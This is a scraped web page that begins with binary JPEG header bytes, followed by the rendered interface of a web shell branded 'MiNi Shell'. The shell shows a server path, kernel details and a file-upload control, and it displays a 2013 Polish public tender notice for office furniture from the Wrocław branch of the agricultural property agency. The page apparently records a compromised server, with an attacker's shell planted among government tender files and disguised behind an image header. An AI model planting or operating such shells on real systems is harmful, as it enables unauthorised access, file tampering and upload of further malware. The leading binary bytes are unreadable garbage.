JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130710/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130710/269020-N-2013.html

<p class="kh_header"><b>Wrocław: Dostawa mebli biurowych</b><br>
<b>Numer ogłoszenia: 269020 - 2013; data zamieszczenia: 10.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu , ul. Mińska 60, 54-610 Wrocław, woj. dolnośląskie, tel. 71 356 39 19, faks 71 357 90 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: sukcesywne dostarczanie, transport, złożenie lub montaż, usunięcie opakowań związanych z dostawą i montażem mebli, ustawienie na miejsce docelowe, wypoziomowanie, wstępną konserwację oraz przystosowanie do ich użytkowania /tj. mycie, czyszczenie/, co roczny bezpłatny przegląd mebli przez okres trwania gwarancji, serwis pogwarancyjny odpłatny na podstawie wyceny z fabryki mebli, bądź po kosztach własnych bez naliczania dodatkowych marż. 
Dostawa obejmuje meble fabrycznie nowe, nieużywane, wolne od wad.
Zamawiający wymaga, aby zaoferowane meble spełniały wymogi określone w Rozporządzeniu Ministra Pracy i Polityki Socjalnej z dnia 10.12.1998 roku w sprawie bezpieczeństwa i higieny pracy na stanowiskach wyposażonych w monitory ekranowe /Dz. U. 98, nr 148 poz.973/.
Meble winny spełniać następujące Polskie normy: 
Krzesła obrotowe - normy dla krzeseł biurowych do pracy: PN EN 1335-1:2004, PN EN 1335-2:2009, PN EN 1335-3: 2009
Biurka -normy dla stołów roboczych i biurek: PN EN 527-1:2011, PN EN 527-2:2004, PN EN 527-3:2004
Krzesło dla petentów - normy dla krzeseł dla gości: PN EN 1376:2004, PN EN 1335 3 2009 AC 2010 oraz PN EN 527 1 2011
Dla zachowania estetyki i ładu przestrzennego Zamawiający wymaga aby zaoferowane meble były podobne w budowie, kształcie, i kolorystyce do mebli w Oddziale Terenowym we Wrocławiu. Poglądowe zdjęcie przedstawiające przykładowe pokoje biurowe w Oddziale Terenowym Agencji Nieruchomości Rolnych z umeblowaniem podano w Dodatku A do SIWZ. 
Zamawiający przedstawił w wykazie maksymalną ilość mebli, które zamierza zakupić jednakże zakupy będą dokonywane na podstawie pisemnego konkretnego zamówienia w którym wskaże ilości mebli faktycznie zamawianych. Zastrzega się zmniejszenie ilości poszczególnych  mebli w zależności od potrzeb i możliwości Zamawiającego. Zamawiający przewiduje że zamówienie z dostawy podstawowej nie zmniejszy się poniżej 60 % ceny wybranej oferty brutto.  
Zamawiający zastrzega sobie prawo do zmniejszenia ilości dostaw w zależności od bieżącego zapotrzebowania, bez prawa wnoszenia roszczeń odszkodowawczych przez Wykonawcę zamówienia.
Zamawiający zastrzega sobie, iż odpłatność będzie uregulowana za dostawy pobrane tj. za faktyczną ilość zrealizowanych dostaw mebli.
Wykonawca będzie zobowiązany do:
realizacji zamówienia sukcesywnie w terminie od dwóch do czterech tygodni od dnia otrzymania poszczególnych zleceń od Zamawiającego, w których zostanie wskazany rodzaj, ilość oraz wymagany termin wykonania.
Realizacji dostaw tylko na podstawie odrębnego pisemnego zlecenia, 

Termin ostatniej podstawowej dostawy mebli i wystawienia faktury nie może przekroczyć 20 grudnia 2013 roku.
Zamawiający przewiduje opcję zakupu mebli rezerwowych.Zamówienie rezerwowe będzie wykorzystane sukcesywnie w przypadku pozyskania środków finansowych na realizację, w miarę potrzeb Zamawiającego od dnia zawarcia umowy do końca 2014 r. Realizacja dostaw rezerwowych będzie następować na odrębne pisemne zlecenie, w którym każdorazowo Zamawiający wskaże rodzaj, ilość oraz termin wykonania zamówienia, nie dłuższy jednak niż  3 tygodnie.
Meble zostały ilościowo i rodzajowo opisane w Dodatku A do SIWZ. Dodatek A zawiera ponadto rysunki poglądowe zamawianych mebli oraz wymagane parametry techniczne wraz z określeniem wymaganych rodzajów materiałów, oraz ilości maksymalne zamawianych poszczególnych typów mebli.
Zamawiający wymaga w ofercie przedstawienia: kolorowych zdjęć i szczegółowych opisów technicznych (w tym wymiary) oferowanych mebli oraz próbek płyty wiórowej oraz materiałów obiciowych. 
Zamawiający żąda, aby oferowane meble posiadały parametry i cechy opisane w dodatkach do  SIWZ i były zgodne ze zleceniami ilościowo rodzajowymi dostarczanymi przez Zamawiającego. 
Meble do poszczególnych pomieszczeń muszą być z tej samej linii (gamy) o takich samych walorach estetycznych, o podobnym klimacie i charakterze. 
Dostawy będą realizowane do obiektu biurowego czynnego i nie mogą utrudniać bieżącego wykonywania obowiązków przez pracowników Zamawiającego.
Przed wykonaniem zamówienia zobowiązuje się wykonawcę do dokonania niezbędnych pomiarów pomieszczeń i dostosowania dostarczanych mebli do wymiarów pomieszczeń.
Zamawiający żąda, aby oferowane krzesła i fotele były produkowane i projektowane zgodnie z ISO 9001. Meble winny posiadać stosowne atesty dopuszczające ich użytkowanie w pomieszczeniach biurowych, atest higieniczności (co najmniej E - 1) oraz badania wytrzymałościowe.
Wykonawca zobowiązany jest do zapoznania się z SIWZ oraz do zdobycia wszelkich informacji, które mogą być konieczne do prawidłowej wyceny wartości dostaw, gdyż wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny.
Wykonawca udzieli Zamawiającemu, co najmniej trzy lata gwarancji na dostarczone meble. 
Przed złożeniem oferty zaleca się przeprowadzenie wizji w budynku Zamawiającego celem zapoznania się z miejscem rozmieszczenia mebli..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca posiada uprawnienia do wykonywania dostawy objętej zamówieniem jeżeli przepisy prawa nakładają obowiązek ich posiadania - Wykonawca zobowiązany jest załączyć do oferty:
- Oświadczenie, potwierdzające że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 3 Formularza Ofertowego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca posiada wiedzę i doświadczenie - Wykonawca zobowiązany jest załączyć do oferty:
- wykaz wykonanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw z podaniem ich wartości,  przedmiotu, dat wykonania i odbiorców. Wymagane jest posiadanie minimalnego doświadczenia:  w okresie ostatnich 3 lat to jest wykonanie co najmniej pięciu tożsamych z przedmiotem zamówienia dostaw mebli biurowych, każda o wartości co najmniej 70 000,00 złotych brutto, z których każda obejmowała min. dostawę krzeseł, szaf i  biurek do obiektów użyteczności publicznej.
-Dowody potwierdzające bezspornie, że dostawy wymienione w wykazie opisanym w pkt. 7.2 zostały wykonane lub są wykonywane należycie. Dowodami są: poświadczenia, a w przypadku, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia - oświadczenie wykonawcy. W razie konieczności, szczególnie, gdy wykaz lub dowody, budzą wątpliwości zamawiającego lub, gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz, którego dostawy były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu. Za dowody uznane będą również dokumenty potwierdzające należyte wykonanie dostaw określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
-Oświadczenie, potwierdzające że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 3 Formularza Ofertowego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, ze wykonawca dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia - Wykonawca zobowiązany jest załączyć do oferty:
-Oświadczenie, potwierdzające że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 3 Formularza Ofertowego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, ze wykonawca dysponuje osobami zdolnymi do wykonania zamówienia - Wykonawca zobowiązany jest załączyć do oferty:
-Oświadczenie, potwierdzające że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 3 Formularza Ofertowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - Wykonawca zobowiązany jest załączyć do oferty:
-opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 100 000,00 złotych. Z przedłożonych dokumentów winno bezspornie wynikać, iż ubezpieczenie jest opłacone poprzez jednoznaczny zapis na polisie lub dowód opłacenia przelewem lub do kasy.
-Oświadczenie, potwierdzające że Wykonawca spełnia warunki określone w art. 22 ust 1 PZP zgodne co do treści z oświadczeniem przedstawionym w załączniku nr 3 Formularza Ofertowego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenia, że oferowane meble: są produkowane i projektowane zgodnie z ISO 9001, posiadają atest higieniczności (co najmniej E - 1 dla mebli z płyty wiórowej)  i badania wytrzymałościowe, Krzesła posiadają tkaniny obiciowe z atestem trudnopalności,  spełniają Polskie Normy: 
	Krzesła obrotowe - normy dla krzeseł biurowych do pracy: PN EN 1335-1:2004, PN EN 1335-2:2009, PN EN 1335-3: 2009
	Biurka -normy dla stołów roboczych i biurek: PN EN 527-1:2011, PN EN 527-2:2004, PN EN 527-3:2004
	Krzesło dla petentów - normy dla krzeseł dla gości: PN EN 1376:2004, PN EN 1335 3 2009 AC 2010 oraz PN EN 527 1 2011</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu 
ul. Mińska 60 54-610 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2013 godzina 10:15, miejsce: Kancelaria Zamawiajacego 
Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu 
ul. Mińska 60 54-610 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje opcję dostaw rezerwowych. Opcję dostaw rezerwowych należy rozumieć jako prawo Zamawiającego (nie obowiązek) do zamówienia dostawy mebli rezerwowych, określonych co do ilości, jakości i rodzaju w dokumentacji do przetargu nieograniczonego, za wynagrodzeniem obliczonym wg cen jednostkowych podanych w ofercie Wykonawcy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com